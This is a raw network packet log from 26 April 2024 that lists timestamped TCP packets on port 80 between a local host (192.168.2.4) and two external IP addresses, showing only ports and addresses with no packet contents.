Apr 26, 2024 23:09:02.852793932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852814913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.852849960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852880955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852893114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.852946043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852958918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852969885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852978945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.852982998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.853009939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.853027105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.853039980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.853064060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.853323936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.853363991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.853384972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.853430033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.853461981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.855088949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.855230093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.855282068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.855494976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.855750084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.855762959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.855796099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.855859995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.855873108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.855902910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.855905056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.855930090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.855946064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.855968952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.855992079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856008053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.856044054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856087923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.856187105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856199026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856210947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856223106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856232882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.856235981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856250048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856259108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.856290102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.856334925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856389999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856426001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.856426954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856467962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856504917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.856523037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856535912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856558084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856575012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.856610060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856632948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856642962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856652021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.856662989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856681108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.856687069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856710911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856730938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.856789112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856801987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856812954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856831074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.856831074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856863022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.856880903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856894016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856905937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856919050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.856941938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.856944084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.856966019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857004881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.857023954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857037067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857069969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.857095957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857244015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857280016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857285976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.857306004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857319117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857357979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.857366085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857408047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.857418060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857433081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857445955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857470989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.857496023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857532978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.857553005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857564926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857598066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.857603073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857626915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857655048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857666016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.857667923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.857702971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.002473116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.002497911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.002516031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.002552986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.043596983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.060357094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.060372114 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.060432911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.060445070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.060509920 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.060559034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.060610056 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.060621023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.060664892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.060715914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.060744047 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.060796976 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.060810089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.060825109 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.060861111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.060873032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.060904026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.060950994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.060964108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.061023951 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.061549902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.061562061 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.061578989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.061634064 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.061847925 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.061872959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.061892986 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.061923981 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.062217951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.062247038 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.062254906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.062289000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.062333107 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.062364101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.062372923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.062410116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.062994957 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.063025951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.063148022 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.063199997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.063234091 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.063266039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.063309908 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.063355923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.063366890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.063407898 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.063430071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.063477039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.063520908 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.063549995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.063560009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.063571930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.063587904 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.063608885 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.063786983 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.063831091 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.063843012 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.063880920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.063885927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.063899040 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.063920975 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.063941002 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.064258099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.064275026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.064308882 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.064326048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.064344883 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.064383984 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.064392090 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.064431906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.064457893 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.064471006 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.064503908 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.064589977 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.064650059 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.064661980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.064675093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.064829111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.065023899 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.065063953 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.065072060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.065109968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.065161943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.065175056 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.065371037 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.065382004 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.065495968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.065542936 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.065555096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.065587044 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.065615892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.066231966 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.066243887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.066265106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.066281080 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.066318989 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.066907883 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.066926003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.066939116 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.066946030 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.066963911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.066979885 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.067740917 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.067753077 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.067779064 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.067791939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.067804098 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.067831039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.068243027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.068288088 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.068304062 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.068346024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.068358898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.068406105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.068422079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.068450928 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.068459034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.068478107 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.068485975 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.068520069 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.071438074 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.071530104 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.071542978 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.071620941 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.071630955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.071671963 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.071681976 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.071729898 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.071742058 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.071782112 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.071804047 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.071846008 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.071914911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.071954966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.071966887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.072011948 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.072060108 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.072103024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.072149992 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.072191954 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.072262049 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.072284937 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.072303057 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.072323084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.072386980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.072427034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.072439909 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.072480917 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.072494030 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.072534084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.072570086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.072611094 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.072679996 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.072721958 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.072732925 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.072770119 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.072828054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.072869062 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.072890043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.072932959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.072945118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.072983980 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.072997093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073016882 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073033094 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073059082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073108912 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073151112 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073218107 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073256969 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073301077 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073338032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073343039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073378086 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073390007 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073430061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073443890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073486090 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073498964 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073539972 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073553085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073592901 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073605061 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073642015 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073653936 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073693037 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073707104 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073746920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073757887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073796988 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073810101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073857069 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073869944 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073910952 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073934078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.073976040 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.073987961 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074032068 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.074074984 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074114084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.074146032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074186087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.074218988 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074259043 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.074270964 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074311018 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.074323893 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074362040 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.074373960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074413061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.074424028 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074456930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.074467897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074506044 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.074531078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074573040 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.074584961 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074624062 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.074636936 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074676037 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.074688911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074731112 CEST	49733	80	192.168.2.4	185.172.128.76
